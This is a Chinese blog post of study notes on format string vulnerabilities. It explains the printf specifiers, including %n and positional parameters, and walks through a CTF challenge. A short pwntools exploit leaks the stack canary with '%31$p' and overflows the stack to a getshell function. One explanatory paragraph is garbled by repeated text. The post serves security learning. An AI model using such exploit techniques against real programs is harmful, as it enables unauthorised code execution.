格式化字符串的简单学习

最新推荐文章于 2024-05-06 16:41:00 发布
最新推荐文章于 2024-05-06 16:41:00 发布
阅读量1.7k 收藏 28
点赞数 21
分类专栏: 你想有多 pwn 文章标签: 学习 汇编 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akdelt/article/details/136106146
版权

文章目录

这几天学的少,过完年就一直在走亲戚(现在看到肉就犯恶心

Format String

格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分

  • 格式化字符串函数
  • 格式化字符串
  • 后续参数,可选

image-20240213094909320

格式化字符串函数

  • 输入
    • scanf
  • 输出
函数基本介绍
printf输出到 stdout
fprintf输出到指定 FILE 流
vprintf根据参数列表格式化输出到 stdout
vfprintf根据参数列表格式化输出到指定 FILE 流
sprintf输出到字符串
snprintf输出指定字节数到字符串
vsprintf根据参数列表格式化输出到字符串
vsnprintf根据参数列表格式化输出指定字节到字符串
setproctitle设置 argv
syslog输出日志
err, verr, warn, vwarn 等。。。

格式化字符串

基本格式如下

%[parameter][flags][field width][.precision][length]type

每一种 pattern 的含义请具体参考维基百科的格式化字符串 。以下几个 pattern 中的对应选择需要重点关注

  • parameter
    • n$,获取格式化字符串中的指定参数
  • flag
  • field width
    • 输出的最小宽度
  • precision
    • 输出的最大长度
  • length,输出的长度
    • hh,输出一个字节
    • h,输出一个双字节
  • type
    • d/i,有符号整数
    • u,无符号整数
    • x/X,16 进制 unsigned int 。x 使用小写字母;X 使用大写字母。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空。
    • o,8 进制 unsigned int 。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空。
    • s,如果没有用 l 标志,输出 null 结尾字符串直到精度规定的上限;如果没有指定精度,则输出所有字节。如果用了 l 标志,则对应函数参数指向 wchar_t 型的数组,输出时把每个宽字符转化为多字节字符,相当于调用 wcrtomb 函数。
    • c,如果没有用 l 标志,把 int 参数转为 unsigned char 型输出;如果用了 l 标志,把 wint_t 参数转为包含两个元素的 wchart_t 数组,其中第一个元素包含要输出的字符,第二个元素为 null 宽字符。
    • p, void * 型,输出对应变量的值。printf(“%p”,a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。
    • n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。
    • %, '%'字面值,不接受任何 flags, width。

参数

就是相应的要输出的变量。

原理

image-20240213095100924

在进入 printf 函数的之前 (即还没有调用 printf),栈上的布局由高地址到低地址依次如下

some value
3.14
123456
addr of "red"
addr of format string: Color %s...

注:这里我们假设 3.14 上面的值为某个未知的值。

在进入 printf 之后,函数首先获取第一个参数,一个一个读取其字符会遇到两种情况

  • 当前字符不是 %,直接输出到相应标准输出。
  • 当前字符是 %, 继续读取下一个字符
    • 如果没有字符,报错
    • 如果下一个字符是 %, 输出 %
    • 否则根据相应的字符,获取相应的参数,对其进行解析并输出

那么假设,此时我们在编写程序时候,写成了下面的样子

printf("Color %s, Number %d, Float %4.2f");

此时我们可以发现我们并没有提供参数,那么程序会如何运行呢?程序照样会运行,会将栈上存储格式化字符串地址上面的三个变量分别解析为

  1. 解析其地址对应的字符串
  2. 解析其内容对应的整形值
  3. 解析其内容对应的浮点值

对于 2,3 来说倒还无妨,但是对于对于 1 来说,如果提供了一个不可访问地址,比如 0,那么程序就会因此而崩溃。

这基本就是格式化字符串漏洞的基本原理了。

简单看一道题

只开了 canary 保护的 64 位程序,ida 打开 elf 文件

image-20240213112332195

还给了一个 getshell 函数

image-20240213112420314

很明显先利用格式化字符串泄露 canary,然后再栈溢出到后门函数。

动态调试一下

image-20240213112501547

这个地方有异或操作,而且之后就跳转回 main 函数,所以 [rbp-0x8] 应该就是栈中存放 canary 的地址

在 printf 处下一个断点然后运行程序,输入 aaa ,查看 [rbp-0x8]

image-20240213114941348

再看一下缓冲区到canary 多少字节

image-20240213115206894

相差 25 个字节

看一下栈中结构

image-20240213115013047

canary 到 返回地址相差一个字节

leak = "%31$p"
io.sendline(leak)
canary = int(io.recv(18)[2:],16)
print(canary)

payload = b'a'*25*8 + p64(canary)
payload += b'a'*1*8
payload += p64(elf.symbols['getshell'])
io.sendline(payload)

%31 p , 64 位程序先是 6 个寄存器 r d i , r s i , r d x , r c x , r 8 , r 9. 然后才是存放在栈帧中, n p,64 位程序先是 6 个 寄存器 rdi,rsi,rdx,rcx,r8,r9.然后才是存放在栈帧中,n p,64位程序先是6个寄存器rdi,rsi,rdx,rcx,r8,r9.然后才是存放在栈帧中,n -> 获取格式化字符串中的指定参数. 31 = 6 + 25 。这样就能泄露栈上第 25 个字节处的值 也就是这道题的 canary。

她送的苦茶子
关注
  • 21
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
格式化字符串漏洞
ylcangel的专栏
10-30 2795
格式化字符串漏洞 github地址:https://github.com/ylcangel/exploits/tree/master/fmtstr 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32 位 内核版本:Linux 2.6.32-754.10.1.el6.i686...
c语言居中字符串,格式化字符串
weixin_39540834的博客
05-17 1700
学习字符串的过程中,我们在前面讲了很多使用方法,实际在使用的过程中,我们经常会需要将字符串格式化,通过格式化输出我们需要的结果。格式化字符串就是在先创建一个空间,然后再这个空间留几个位置,然后根据需求填入相应的内容,这里留出的位置相当于占位符,格式化字符串有两种方式。一种是使用%操作符,一种是使用format()方法。1.%操作符%操作符在我们格式化字符串的时候十分方便,它的语法结构如下:‘%...
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1625
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
格式化字符串你都懂了吗
程序员小十一的博客
02-16 6799
博文中讲解了Python的字符串格式化两种方法:% 和 format()
格式化字符串漏洞学习笔记
weixin_61967363的博客
04-14 483
该文章详细介绍了格式化字符串溢出漏洞的形成和利用,文章包含了格式化字符串漏洞的利用代码和讲解
CTF PWN 格式化字符串
VisualNull的博客
06-05 1135
CTF PWN格式化字符串
【Java】Java 中格式化字符串:String.format() 方法
Etui۹(・༥・´)و的博客
06-26 5505
虽然适合调试和显示简单消息,但它不太适合格式化字符串格式化字符串不仅显示字符串内容,而且还按照指定的顺序显示内容。例如,当显示像100000000这样的大整数时,您可能需要包含逗号,以便它显示为。与小数类似,您可能希望显示特定的小数位数,例如199.53以及四舍五入。程序员会很高兴知道 Java 提供了一些格式化方法,并为各种数据类型(例如DoubleInteger和Date)提供了充足的支持。在 Java 中格式化字符串有三种主要方法。您可以使用**String.format()**方法、
学习笔记】32、字符串格式化
少年休闲海
10-23 4566
字符串格式化 Python中字符串格式化的方法不止一种,每种方式都有它的优缺点,具体使用哪一种,需要取决于具体情况。 一、旧式字符串格式化 Python内置了一个独特的字符串操作:通过“%操作符”可以方便快捷地进行位置格式化。 如果要在单个字符串中进行多次替换,需要对旧式字符串格式化语法加以改动,由于%操作符只能接收一个参数,因此需要将字符串包装到右边的元组中。 二、新式字符串格式化 新式字符串格式化可以免去%操作符这种特殊的语法,并使得字符串格式化的语法更加规整..
漏洞学习笔记——格式化字符串溢出
谈成(C/C++)
04-30 868
格式化字符串溢出指的是调用类似sprintf函数时,没有限定长度而产生溢出。printf中的%s是直接在后面的参数栈中搜索字符串的,直到遇到’\0’。以下代码就可以产生简单格式化溢出效果。 #include "stdafx.h" #include <stdlib.h> #include <windows.h> #pragma runtime_checks( "[runtime_checks]", off) void Overflow(char* pData, unsigned
好好说话之格式化字符串漏洞利用
hollk’s blog
08-05 3097
编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 一、格式化字符串漏洞利用 格式化字符串漏洞两大利用手段: 是程序崩溃,因为%s对应的参数地址不合法的概率比较大 查看进程内容,根据%d,%f输出了栈上的内容 二、程序崩溃 一般输入若干个%s即可 %s%s%s%s%s%s%s%s%s%s%s%s%s%s 栈上不可能每个值都对应了合法地址,总会有某个地址可以使得程序崩溃,不能控制,但是可以玩坏。例如,如果远程服务有个格式化字符串漏洞,那么就可以攻击其可用性,使服务崩溃,进而使
格式化写入字符串_labview_
09-30
简单字符串,可以帮助您了解相关功能,方便学习
Python 元组-元组和格式化字符串
05-06
Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,Python提供了高效的高级数据结构,还能简单有效地面...Python教学简单易懂,零基础小白也可以学会,只要你有耐心学习从入门到精通.从小白到高手
Python字符串格式化%s%d%f详解
12-24
关于讨论输出格式化的问题,小编不是一时兴起,之前学习python的时候就经常遇到输出时“%d”,一直没有仔细学习,今天又看到了,下面分享一个简单实例,python输出99乘法表: #!/usr/bin/python # -*- coding: UTF-...
Python变量的输入输出-格式化输出字符串变量
05-06
Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,Python提供了高效的高级数据结构,还能简单有效... Python教学简单易懂,零基础小白也可以学会,只要你有耐心学习从入门到精通.从小白到高手
shell学习之printf命令格式化输出语句
01-11
如同 echo 命令,printf 命令也可以输出简单字符串: $printf Hello, Shell\n Hello, Shell $ printf 不像 echo 那样会自动换行,必须显式添加换行符(\n)。 printf 命令的语法: printf format-string ...
JAVA 学习·泛型(二)——通配泛型
wr114514的博客
05-02 1077
介绍了Java泛型中的重要知识点——通配泛型及其应用。
限流的学习
weixin_43675252的博客
05-01 466
限流算法:滑动窗口算法滑动日志算法漏桶算法令牌桶算法。
STM32CubeMX学习笔记30---FreeRTOS内存管理
最新发布
H2z1220的博客
05-06 826
FreeRTOS 操作系统将内核与内存管理分开实现,操作系统内核仅规定了必要的内存管理函数原型,而不关心这些内存管理函数是如何实现的,所以在 FreeRTOS 中提供了多种内存分配算法(分配策略),但是上层接口(API)却是统一的。这样做可以增加系统的灵活性:用户可以选择对自己更有利的内存管理策略,在不同的应用场合使用不同的内存分配策略。
Java---类和方法的再学习
m0_74012211的博客
05-05 1119
Java类与对象
java时间格式化
05-25
Java中可以使用SimpleDateFormat类来进行时间格式化。以下是一个简单的示例: ```java import java.text.SimpleDateFormat; import java.util.Date; public class DateFormatExample { public static void main(String[] args) { // 创建一个SimpleDateFormat对象,指定日期格式 SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); // 获取当前时间 Date date = new Date(); // 将日期格式化为指定格式的字符串 String formattedDate = sdf.format(date); // 输出格式化后的日期字符串 System.out.println(formattedDate); } } ``` 输出结果为:2022-06-09 14:30:15 在SimpleDateFormat构造方法中传入的字符串表示日期格式,具体格式化规则可以参考Java官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值